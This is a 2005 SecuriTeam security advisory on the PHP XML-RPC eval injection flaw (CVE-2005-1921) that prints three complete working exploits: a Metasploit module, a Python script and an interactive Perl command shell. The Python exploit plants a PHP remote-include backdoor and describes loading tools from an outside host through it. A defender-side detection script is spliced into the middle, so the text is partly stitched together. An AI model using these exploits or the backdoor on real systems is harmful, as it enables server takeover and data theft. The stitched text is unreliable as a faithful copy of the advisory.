[EXPL] XMLRPC Remote Commands Execution (Multiple Exploits)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/05

    To: list@securiteam.com
    Date: 27 Jul 2005 16:44:40 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      XMLRPC Remote Commands Execution (Multiple Exploits)
    ------------------------------------------------------------------------

    SUMMARY

    Lack of parameter filtering by the xmlrpc.php script allows a remote
    attacker to cause the script to execute arbitrary code. The following
    exploit codes can be used to test your system for the mentioned
    vulnerability.

    DETAILS

    Exploit #1:
    ##
    # This file is part of the Metasploit Framework and may be redistributed
    # according to the licenses defined in the Authors field below. In the
    # case of an unknown or missing license, this file defaults to the same
    # license as the core Framework (dual GPLv2 and Artistic). The latest
    # version of the Framework can always be obtained from metasploit.com.
    ##

    package Msf::Exploit::php_xmlrpc_eval;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    use bytes;

    my $advanced = { };

    my $info = {
    'Name' => 'PHP XML-RPC Arbitrary Code Execution',
    'Version' => '$Revision: 1.1 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' =>
    {
    'RHOST' => [1, 'ADDR', 'The target address'],
    'RPORT' => [1, 'PORT', 'The target port', 80],
    'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
    'RPATH' => [1, 'DATA', 'Path to the XML-RPC script', '/xmlrpc.php'],
    'SSL' => [0, 'BOOL', 'Use SSL'],
    },

    'Description' => Pex::Text::Freeform(qq{
    This module exploits an arbitrary code execution flaw discovered in many
    implementations of the PHP XML-RPC module. This flaw is exploitable through
    a number of PHP web applications, including but not limited to Drupal,
    Wordpress, Postnuke, and TikiWiki.
    }),

    'Refs' =>
    [
    ['BID', '14088'],
    ['CVE', '2005-1921'],
    ],

    'Payload' =>
    {
    'Space' => 512,
    'Keys' => ['cmd', 'cmd_bash'],
    },

    'Keys' => ['xmlrpc'],
    };

    sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
    @_);
    return($self);
    }

    sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost = $self->GetVar('VHOST') || $target_host;
    my $path = $self->GetVar('RPATH');
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

    # Encode the command as a set of chr() function calls
    my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

    # Create the XML-RPC post data
    my $data =
    '<?xml version="1.0"?>'.
    "<methodCall><methodName>" .
    Pex::Text::AlphaNumText(int(rand(128)+32))."</methodName>".
    "<params><param><name>" .
    Pex::Text::AlphaNumText(int(rand(128)+32))."');".
    "echo('_cmd_beg_\n');".
    "passthru($byte);".
    "echo('_cmd_end_\n');".
    ";//</name><value>".
    Pex::Text::AlphaNumText(int(rand(128)+32)).
    "</value></param></params></methodCall>";

    my $req =
    "POST $path HTTP/1.1\r\n".
    "Host: $vhost:$target_port\r\n".
    "Content-Type: application/xml\r\n".
    "Content-Length: ". length($data)."\r\n".
    "Connection: Close\r\n".
    "\r\n". $data . "\r\n";

    my $s = Msf::Socket::Tcp->new(
    'PeerAddr' => $target_host,
    'PeerPort' => $target_port,
    'LocalPort' => $self->GetVar('CPORT'),
    'SSL' => $self->GetVar('SSL'),
    );

    if ($s->IsError){
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return;
    }

    $self->PrintLine("[*] Sending the malicious XML-RPC POST request...");

    $s->Send($req);

    my $results = $s->Recv(-1, 20);
    $s->Close();

    if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
    my $out = $1;
    $out =~ s/^\s+|\s+$//gs;
    if ($out) {
    $self->PrintLine('----------------------------------------');
    $self->PrintLine('');
    $self->PrintLine($out);
    $self->PrintLine('');
    $self->PrintLine('----------------------------------------');
    }
    }

    return;
    }

    1;

    #EoF

    Exploit #2:
    #!/usr/bin/python

    # ./xmlrpc.py [chk|xpl] host uri
    # example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php
    # example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php
    # Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me
    # so i made this python code
    # http://pear.php.net/bugs/bug.php?id=4692
    # Bug #4692 Remote Code Exection In XML RPC Server
    # xmlrpc.pl http://pathtoxmlrpc/server
    # "id;pwd;uname -a;uptime"
    # [*] Sending command id;pwd;uname -a;uptime
    # [*] Command sent, waiting for response
    # uid=33(www-data) gid=33(www-data) groups=33(www-data)
    # /var/www/drupal
    # Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
    # 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21
    # http://www.postnuke.com/xmlrpc.php
    # by k3rn3lp4nic. greetz: albanian security clan!!! july 2005

    import sys, httplib

    try:
        chose = sys.argv[1]
    except IndexError:
        chose = 'chk'

    try:
        host = sys.argv[2]
    except IndexError:
        host = 'www.postnuke.com'

    try:
        uri = sys.argv[3]
    except IndexError:
        uri = '/xmlrpc.php'

    def check():
        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
            <params>
                <param>
                <value><name>','')); phpinfo(); exit;/*</name></value>
                </param>
            </params>
        </methodCall>
        """

        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        print 'If you see phpinfo dump data the you are succeful. proceed with xpl!'

    def xpl():

        SoapMessage = """<?xml version="1.0"?>
        <methodCall>
        <methodName>test.method</methodName>
            <params>
                <param>
                <value><name>',''));
        echo 'start';
        passthru('del xmlrpcpy.php');
        $filename = 'xmlrpcpy.php';
        $somecontent = '%?php include(~inc); ?#';
        $somecontent = eregi_replace('%', chr(60), $somecontent);
        $somecontent = eregi_replace('~', chr(36), $somecontent);
        $somecontent = eregi_replace('#', chr(62), $somecontent);
        $handle = fopen($filename,'w');
        fwrite($handle, $somecontent);
        fclose($handle);

        passthru('dir');

        passthru('type xmlrpcpy.php');

        echo 'done';
        exit;
        /*</name></value>
                </param>
            </params>
        </methodCall>
        """

        webservice = httplib.HTTP("%s" % host)
        webservice.putrequest("POST", "%s" % uri)
        webservice.putheader("Host", "%s" % host)
        webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")
        webservice.putheader("Content-type", "application/xml")
        webservice.putheader("Content-length", "%d" % len(SoapMessage))
        webservice.endheaders()
        webservice.send(SoapMessage)

        # get the response

        statuscode, statusmessage, header = webservice.getreply()
        print "Response: ", statuscode, statusmessage
        print "headers: ", header
        res = webservice.getfile().read()
        print res
        # string concatenation in Python is '+', not '.'
        print '\n\nExploit Successful!!!\n' + 'Download http://www.suneworld.com/programs/webexplorer20.zip'
        print 'Rename index.php3 to index.txt and put it to some public host http://somehost.com/index.txt'
        print 'Now Accessed it like this: '
        print 'http://victimhost/postnukewhatever/' + 'xmlrpcpy.php?inc=http://somehost.com/index.txt'
        print 'Then upload your favorite haxor tools! Bye. Stay healthy!'

    if __name__ == "__main__":
        print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'
        print 'revised it if you can! ver jul 2005'
        print 'Greetz: Albanian Security Clan!!!'
        print '---------------------------------------------'
        print './xmlrpc.py [chk|xpl] host uri'
        print 'example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php'
        print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php'
        if chose=='chk':
            check()
        elif chose=='xpl':
            xpl();
        else:
            print 'Boom! Script Kiddie'

    #EoF

    Exploit #3:
    #!/usr/bin/perl
    #
    # ilo--
    #
    # This program is no GPL or has nothing to do with FSF, but some
    # code was ripped from romansoft.. sorry, too lazy!
    #
    # xmlrpc bug by James from GulfTech Security Research.
    # http://pear.php.net/bugs/bug.php?id=4692
    # xmlrpc drupal exploit, but James sais xoops, phpnuke and other
    # cms should be vulnerable.
    #
    # greets: !dSR digitalsec.net
    #
    require LWP::UserAgent;
    use URI;
    use Getopt::Long;
    use strict;
    $| = 1; # fflush stdout after print

    # Default options
    # connection
    my $basic_auth_user = '';
    my $basic_auth_pass = '';
    my $proxy = '';
    my $proxy_user = '';
    my $proxy_pass = '';
    my $conn_timeout = 15;

    # general
    my $host;
     
     #informational lines to feed my own ego.
     print "xmlrpc exploit - http://www.reversing.org \n";
     print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
     print "special chars allowed are / and - \n\n";

     # read command line options
     my $options = GetOptions (

     #general options
     'host=s' => \$host, # input host to test.

     # connection options
     'basic_auth_user=s' => \$basic_auth_user,
     'basic_auth_pass=s' => \$basic_auth_pass,
     'proxy=s' => \$proxy,
     'proxy_user=s' => \$proxy_user,
     'proxy_pass=s' => \$proxy_pass,
     'timeout=i' => \$conn_timeout);

     # command line sanity check
     &show_usage unless ($host);

     # main loop
     while (1){
     print "\nxmlrpc@# ";
     my $cmd = <STDIN>;
     xmlrpc_xploit ($cmd);
     }

     exit (1);

    #exploit
    sub xmlrpc_xploit {
    chomp (my $data = shift);
    my $reply;

    my $d1 = "<?xml version=\"1.0\"?><methodCall>". "<methodName>".
    "examples.getStateName</methodName>" . "<params><param><name>a');";
    my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

     # '-' and '/' are rewritten as PHP chr() calls so the generated code
     # stays a single-quoted string; PHP has chr(), not char()
     $data =~ s/-/'.chr(45).'/mg;
     $data =~ s/\//'.chr(47).'/mg;

     my $req = new HTTP::Request 'POST' => $host;
     $req->content_type('application/xml');
     $req->content($d1.'system(\''.$data.'\')'.$d2);
     
     my $ua = new LWP::UserAgent;
     $ua->agent("xmlrpc exploit R/0.1");
     $ua->timeout($conn_timeout);

     if ($basic_auth_user){
      $req->authorization_basic($basic_auth_user, $basic_auth_pass)
     }
     if ($proxy){
      $ua->proxy(['http'] => $proxy);
      $req->proxy_authorization_basic($proxy_user, $proxy_pass);
     }
     
     #send request, return null if not OK
     my $res = $ua->request($req);
     if ($res->is_success){
       $reply= $res->content;
     } else {
       $reply = "";
     }
     $reply =~ /(.*).(<pre>warning.*)/mgsi;
     print ($1);
    }

    # show options
    sub show_usage {
     print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
     print "main options\n";
     print "connection options\n";
     print "\t--proxy (http), --proxy_user, --proxy_pass\n";
     print "\t--basic_auth_user, --basic_auth_pass\n";
     print "\t--timeout \n";
     print "\nExample\n";
     print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
     print "\n";
     exit(1);
    }
    #Eof
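As an added defender-side example (not part of the advisory or of any of the three exploits above): a small Python checker that inspects an XML-RPC request body for the breakout pattern all three exploits share, namely `<name>`/`<methodName>` text that is not a plain identifier and carries quote, parenthesis or comment fragments intended for the library's eval() string. The sample bodies are constructed here, not captured traffic, and the identifier character set is an assumption based on ordinary XML-RPC method and member names.

```python
"""Flag XML-RPC request bodies whose <name>/<methodName> text tries to break
out of the PEAR XML-RPC parser's eval() string (CVE-2005-1921)."""
import re

# Assumption: legitimate method and struct-member names are identifiers made
# of letters, digits and a few separators (e.g. examples.getStateName).
SAFE_NAME = re.compile(r'^[A-Za-z0-9_.:/-]*$')
# Grab the text of each name-like element; re.S lets payloads span lines.
TAG_RE = re.compile(r'<(methodName|name)\s*>(.*?)</\1\s*>', re.S | re.I)
# Fragments an injection needs: quote/paren breakout, statement end,
# and a comment opener to neutralise the rest of the generated PHP.
MARKERS = ("')", "'))", "');", "//", "/*", "passthru(", "system(", "eval(")


def suspicious_names(body):
    """Return (tag, truncated value, reason) for every name-like element
    whose text could not be a plain identifier."""
    hits = []
    for m in TAG_RE.finditer(body):
        tag, value = m.group(1), m.group(2).strip()
        if SAFE_NAME.match(value):
            continue
        found = [k for k in MARKERS if k in value]
        reason = ", ".join(found) if found else "non-identifier characters"
        hits.append((tag, value[:60], reason))
    return hits


def is_exploit_attempt(body):
    return bool(suspicious_names(body))


# Constructed sample bodies (not captured traffic): one benign call and two
# of the injection shapes used by the exploits in this advisory.
BENIGN = ('<?xml version="1.0"?><methodCall><methodName>examples.getStateName'
          '</methodName><params><param><value><struct><member><name>stateNum'
          '</name><value><i4>41</i4></value></member></struct></value>'
          '</param></params></methodCall>')
MSF_STYLE = ('<?xml version="1.0"?><methodCall><methodName>aZ9</methodName>'
             "<params><param><name>bY8');echo('_cmd_beg_');passthru(chr(105)"
             ".chr(100));echo('_cmd_end_');;//</name><value>cX7</value>"
             '</param></params></methodCall>')
PHPINFO_STYLE = ('<methodCall><methodName>test.method</methodName><params>'
                 "<param><value><name>','')); phpinfo(); exit;/*</name>"
                 '</value></param></params></methodCall>')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("msf", MSF_STYLE),
                        ("phpinfo", PHPINFO_STYLE)):
        print(label, suspicious_names(body))
```

Run the checker over a WAF or web-server request-body log; a hit on an `xmlrpc.php` endpoint is worth an alert even on a patched host, since it identifies a scanning source.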

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:crg@digitalsec.net> Crg and
    <mailto:hdm@metasploit.com> H D Moore.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

